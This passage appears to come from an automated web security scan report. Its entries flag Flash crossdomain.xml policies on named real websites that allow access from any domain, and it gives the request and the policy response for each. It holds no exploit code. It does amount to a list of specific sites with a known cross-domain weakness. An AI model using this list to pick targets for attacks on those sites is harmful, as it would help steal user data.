<allow-access-from domain="img2-short.timeinc.net"/>
<allow-access-from domain="*.aol.com"/>
<allow-access-from domain="*.digitalcity.com"/>
<allow-access-from domain="*.aolcdn.com"/>
<allow-access-from domain="*.channel.aol.com"/>
<allow-access-from domain="*.aimtoday.com"/>
<allow-access-from domain="*.aimtoday.aim.com"/>
<allow-access-from domain="*.dashboard.aim.com"/>
<allow-access-from domain="*.aim.com"/>
<allow-access-from domain="peopleconnection.aol.com"/>
<allow-access-from domain="*.peoplecmg.com"/>
<allow-access-from domain="*.myspacecdn.com"/>
<allow-access-from domain="*.taaz.com" secure="true"/>
...[SNIP]...

7.107. http://www.pittsburghlive.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pittsburghlive.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain, uses a wildcard to specify allowed domains, and allows access from specific other domains.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.pittsburghlive.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:10:01 GMT
Server: Apache/2.2.3 (Red Hat) PHP/5.1.6
Last-Modified: Mon, 24 Jan 2011 21:35:59 GMT
Accept-Ranges: bytes
Content-Length: 455
Vary: Accept-Encoding,User-agent
Connection: close
Content-Type: text/xml

<cross-domain-policy xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:noNamespaceSchemaLocation="http://www.adobe.com/xml/schemas/PolicyFile.xsd">
       <site-control permitted-cross-domain-poli
...[SNIP]...
<allow-access-from domain="*" />
       <allow-access-from domain="*.brightcove.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.abacast.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.pittsburghlive.com"/>
...[SNIP]...

7.108. http://www.playfin.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.playfin.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.playfin.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:06:52 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Thu, 17 Feb 2011 23:46:03 GMT
ETag: "1cf1115-c6-49c83001704c0"
Accept-Ranges: bytes
Content-Length: 198
Vary: Accept-Encoding
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

7.109. http://www.pokerstars.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pokerstars.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain, uses a wildcard to specify allowed domains, and allows access from specific other domains.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.pokerstars.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:56:55 GMT
Server: Apache
Last-Modified: Tue, 25 Jan 2011 19:43:06 GMT
ETag: "5af-ece20680"
Accept-Ranges: bytes
Content-Length: 1455
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.pokerstarsblog.com"/>
<allow-access-from domain="*.pokerstars.com"/>
<allow-access-from domain="*.pokerstars.pl"/>
<allow-access-from domain="*.pokerstars.es"/>
<allow-access-from domain="*.pokerstars.fi"/>
<allow-access-from domain="*.pokerstars.hu"/>
<allow-access-from domain="*.pokerstars.nl"/>
<allow-access-from domain="*.pokerstars.se"/>
<allow-access-from domain="*.pokerstars.co.uk"/>
<allow-access-from domain="*.pokerstars.it"/>
<allow-access-from domain="*.pokerstars.si"/>
<allow-access-from domain="*.pokerstars.pt"/>
<allow-access-from domain="*.pokerstars.cz"/>
<allow-access-from domain="*.appt.com"/>
<allow-access-from domain="*.europeanpokertour.com"/>
<allow-access-from domain="*.wcoop.com"/>
<allow-access-from domain="*.pokerstars.tv"/>
<allow-access-from domain="*.joehachem.com"/>
<allow-access-from domain="*.chrismoneymaker.com"/>
<allow-access-from domain="*.greg-raymer.net"/>
<allow-access-from domain="*.andre-akkari.com"/>
<allow-access-from domain="*.danielnegreanu.ca"/>
<allow-access-from domain="*.hevad-khan.com"/>
<allow-access-from domain="*.lee-nelson.net"/>
<allow-access-from domain="*.vanessa-rousso.net"/>
<allow-access-from domain="*"/>
...[SNIP]...

7.110. http://www.popularscreensavers.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.popularscreensavers.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.popularscreensavers.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:34:45 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8c DAV/2 mod_jk/1.2.28
ETag: W/"241-1301508774000"
Last-Modified: Wed, 30 Mar 2011 18:12:54 GMT
Content-Length: 241
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>
<allow-http-request-headers-from domain="*" headers="*"/>
<allow-access-from domain="*"/>
...[SNIP]...

7.111. http://www.rawtube.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.rawtube.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.rawtube.com

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (CentOS)
Last-Modified: Wed, 13 May 2009 01:35:39 GMT
ETag: "820f-13b-469c13a9090c0"
Content-Type: text/xml
Content-Length: 315
Via: www.rawtube.com
Date: Sat, 02 Apr 2011 12:32:31 GMT
X-Varnish: 863747465 862901038
Age: 3296
Via: 1.1 varnish
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM
"http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="all"/>
   <allow-access-from domain="*" />
...[SNIP]...

7.112. http://www.realsimple.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.realsimple.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain, uses a wildcard to specify allowed domains, and allows access from specific other domains.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.realsimple.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:44:09 GMT
Server: Apache
Last-Modified: Tue, 06 Oct 2009 18:54:33 GMT
ETag: "2158b86-16c-47548c2caac40"
Accept-Ranges: bytes
Content-Length: 364
Content-Type: application/xml
Vary: X-Catmap-Header
P3P: CP='PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA PRE CUR ADMa DEVa TAIo PSAo PSDo IVAo IVDo CONo TELo OTPi OUR UNRo PUBi OTRo IND DSP CAO COR'
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" secure="false"/>
<allow-access-from domain="*.redcated" />
<allow-access-from domain="*.atlassolutions.com" />
<allow-access-from domain="*.akamai.net" />
...[SNIP]...

7.113. http://www.redorbit.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.redorbit.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.redorbit.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:34:39 GMT
Server: Apache
Last-Modified: Tue, 01 Mar 2011 15:00:52 GMT
Accept-Ranges: bytes
Content-Length: 208
Vary: User-Agent
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain
...[SNIP]...

7.114. http://www.scout.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.scout.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.scout.com

Response

HTTP/1.1 200 OK
Content-Length: 222
Content-Type: text/xml
Content-Location: http://www.scout.com/crossdomain.xml
Last-Modified: Thu, 19 Aug 2010 20:24:22 GMT
Accept-Ranges: bytes
ETag: "01f3482dc3fcb1:110f"
Server: Microsoft-IIS/6.0
Server: Static2
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:44:51 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" secure="false" />

...[SNIP]...

7.115. http://www.sendspace.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sendspace.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.sendspace.com

Response

HTTP/1.0 200 OK
Content-Type: text/xml
ETag: "1797000725"
Last-Modified: Fri, 01 Apr 2011 07:15:01 GMT
Content-Length: 115
Connection: close
Date: Sat, 02 Apr 2011 14:08:28 GMT
Server: Apache

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
</cross-domain-policy>

7.116. http://www.sfgate.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sfgate.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.sfgate.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:43:16 GMT
Server: Apache/2.2.16 (Linux/SUSE) DAV/2 mod_fcgid/2.3.5 mod_perl/2.0.4 Perl/v5.12.1
Set-Cookie: Apache=173.193.214.243.1301751796195568; path=/; max-age=31536000; domain=.sfgate.com
Last-Modified: Tue, 09 Jan 2007 23:06:08 GMT
ETag: "4d737b-cb-426a397623678"
Accept-Ranges: bytes
Content-Length: 203
Vary: Accept-Encoding
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-polic
...[SNIP]...

7.117. http://www.sheknows.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sheknows.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.sheknows.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:53:25 GMT
Server: Apache/2
Accept-Ranges: bytes
Content-Length: 201
Vary: Accept-Encoding
X-Served-By: app3v-sk.wuo.lax2
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*" />
</cross-domain-policy
...[SNIP]...

7.118. http://www.shockwave.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.shockwave.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain, uses a wildcard to specify allowed domains, and allows access from specific other domains.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.shockwave.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.6 (Unix) mod_ssl/2.2.6 OpenSSL/0.9.7a Resin/3.1.2
Last-Modified: Wed, 25 Feb 2009 04:02:39 GMT
ETag: "11d7972a2-109-463b64e7f35c0"
Accept-Ranges: bytes
Content-Length: 265
Content-Type: application/xml
Cache-Control: max-age=624
Expires: Sat, 02 Apr 2011 13:55:06 GMT
Date: Sat, 02 Apr 2011 13:44:42 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
<allow-access-from domain="*.nick.com" secure="true" />
...[SNIP]...

7.119. http://www.slideshare.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.slideshare.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.slideshare.net

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Content-Type: text/xml
Last-Modified: Fri, 01 Apr 2011 18:28:13 GMT
Expires: Sun, 03 Apr 2011 12:32:11 GMT
Cache-Control: max-age=86400
Content-Length: 222
Date: Sat, 02 Apr 2011 13:37:27 GMT
X-Varnish: 2056362629 2055719298
Age: 3916
Via: 1.1 varnish
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" to-ports="*" />

...[SNIP]...

7.120. http://www.spike.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.spike.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.spike.com

Response

HTTP/1.0 200 OK
Server: Apache/2.0.63 (Unix) PHP/5.3.2
Last-Modified: Wed, 23 Jun 2010 15:37:40 GMT
ETag: "5db0a-102-489b4516c1900"
Accept-Ranges: bytes
Content-Length: 258
Content-Type: application/xml
Date: Sat, 02 Apr 2011 13:31:39 GMT
Connection: close
Set-Cookie: ak-mobile-detected=no; expires=Sat, 02-Apr-2011 19:31:39 GMT; path=/
Vary: User-Agent

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*"/>
   <allow-http-request-hea
...[SNIP]...

7.121. http://www.sportsnetwork.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sportsnetwork.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.sportsnetwork.com

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-Powered-By: ASP.NET
Cache-Control: max-age=60
Expires: Sat, 02 Apr 2011 13:44:06 GMT
Date: Sat, 02 Apr 2011 13:43:06 GMT
Content-Type: text/xml
Accept-Ranges: bytes
Last-Modified: Mon, 20 Jul 2009 16:18:35 GMT
ETag: "d2a1a8bb559ca1:160a"
Content-Length: 202

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-polic
...[SNIP]...

7.122. http://www.swagbucks.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.swagbucks.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.swagbucks.com

Response

HTTP/1.1 200 OK
Content-Length: 186
Content-Type: text/xml
Last-Modified: Thu, 11 Jun 2009 18:44:34 GMT
Accept-Ranges: bytes
ETag: "48a15aac4eac91:4dd"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:52:55 GMT
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<!--http://www.swagbucks.com/content/flash/crossdomain.xml-->
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

7.123. http://www.syfy.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.syfy.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.syfy.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8b DAV/2 PHP/5.2.6 mod_perl/2.0.4 Perl/v5.12.2
Last-Modified: Mon, 14 Sep 2009 16:36:06 GMT
ETag: "9c9dd1-a3-4738c4325a980"
Accept-Ranges: bytes
Content-Length: 163
Content-Type: application/xml
Cache-Control: max-age=300
Expires: Sat, 02 Apr 2011 14:11:19 GMT
Date: Sat, 02 Apr 2011 14:06:19 GMT
Connection: close
Set-Cookie: ak-mobile-detected=no; expires=Sun, 03-Apr-2011 14:06:19 GMT; path=/
Vary: User-Agent

<?xml version="1.0"?>
<!-- !!!syfy!!! http://blog.scifi.com/crossdomain.xml -->
<cross-domain-policy>
   <allow-access-from domain="*" />    
</cross-domain-policy>

7.124. http://www.tampabay.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tampabay.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.tampabay.com

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Date: Sat, 02 Apr 2011 13:39:21 GMT
Content-Type: text/xml
Connection: close
Cache-control: public,private
Last-modified: Mon, 23 Jun 2008 21:00:46 GMT
Etag: "52-48600efe"
X-Cacheable: YES
Content-Length: 82
X-Varnish: 380322934 380303585
Age: 283
Via: 1.1 varnish
X-Served-By: varnish-a
X-Cache: HIT
X-Cache-Hits: 2
X-Cache-Backend: default

<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

7.125. http://www.tastebook.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tastebook.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.tastebook.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:09:10 GMT
Server: Apache
Last-Modified: Mon, 07 Mar 2011 22:16:25 GMT
Accept-Ranges: bytes
Content-Length: 146
Cache-Control: max-age=300
Expires: Sat, 02 Apr 2011 14:14:10 GMT
Vary: Accept-Encoding
P3P: policyref="http://www.tastebook.com/w3c/p3p.xml", CP="ALL DSP COR LAW CURa CONi OUR BUS IND PHY ONL UNI PUR COM NAV STA"
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!-- http://www.foo.com/crossdomain.xml -->
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

7.126. http://www.teennick.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.teennick.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain, uses a wildcard to specify allowed domains, and allows access from specific other domains.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.teennick.com

Response

HTTP/1.0 200 OK
Server: Apache/2.0.63 (Unix) mod_jk/1.2.27
ETag: W/"2563-1301085024000"
Last-Modified: Fri, 25 Mar 2011 20:30:24 GMT
Content-Length: 2563
Content-Type: text/xml
Cache-Control: max-age=600
Date: Sat, 02 Apr 2011 14:18:01 GMT
Connection: close
Set-Cookie: ak-mobile-detected=no; expires=Sat, 02-Apr-2011 20:18:01 GMT; path=/
Vary: User-Agent

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*.mtvi.com"/>
   <allow-access-from domain="*.nick.com"/>
   <allow-access-from domain="*.nickjr.com"/>
   <allow-access-from domain="*.nickjr-d.mtvi.com"/>
   <allow-access-from domain="*.nickjr-q.mtvi.com"/>
   <allow-access-from domain="*.nickonline.com"/>
   <allow-access-from domain="*.kids.nickonline.com"/>
   <allow-access-from domain="*.addictinggames.com"/>
   <allow-access-from domain="*.shockwave.com"/>    
   <allow-access-from domain="*.nickatnite.com"/>
   <allow-access-from domain="*.nickatnight.com"/>    
   <allow-access-from domain="*.magorium.com"/>    
   <allow-access-from domain="*.doubleclick*"/>
   <allow-access-from domain="*.the-n.com"/>
   <allow-access-from domain="*.theredspace.com"/>
   <allow-access-from domain="24.222.18.26"/>
   <allow-access-from domain="*.nicktoonsnetwork.com"/>
   <allow-access-from domain="*.mtvnservices.com"/>
   <allow-access-from domain="*.biggreenhelp.com"/>
   <allow-access-from domain="*.nick.co.kr"/>
   <allow-access-from domain="*.nicktv.it"/>
   <allow-access-from domain="*.popsicle.com"/>
   <allow-access-from domain="*.mtv.pl"/>
   <allow-access-from domain="96.10.20.67"/>    
   <allow-access-from domain="*.mua.nick-d.mtvi.com"/>
   <allow-access-from domain="*.mua.nick-q.mtvi.com"/>
   <allow-access-from domain="*.mua.nick.com"/>
   <allow-access-from domain="kca.gigya.s3.amazonaws.com"/>
   <allow-access-from domain="http://testing.arkadium.com"/>
...[SNIP]...
<allow-access-from domain="*.neopets.com"/>
   <allow-access-from domain="gamestudio.sarbakangames.com"/>
   <allow-access-from domain="*.scenic-d.mtvi.com/"/>
   <allow-access-from domain="*.scenic-q.mtvi.com/"/>
   <allow-access-from domain="*.scenic-l.mtvi.com/"/>
   <allow-access-from domain="live.toptrumps.com"/>
   <allow-access-from domain="*.doubleclick.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.2mdn.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.dartmotif.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.doubleclick.net" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.doubleclick.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.doubleclick.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.2mdn.net" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.dartmotif.net" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.gstatic.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*"/>
...[SNIP]...

7.127. http://www.terra.com/crossdomain.xml  previous  next

Summary

<
Severity:   High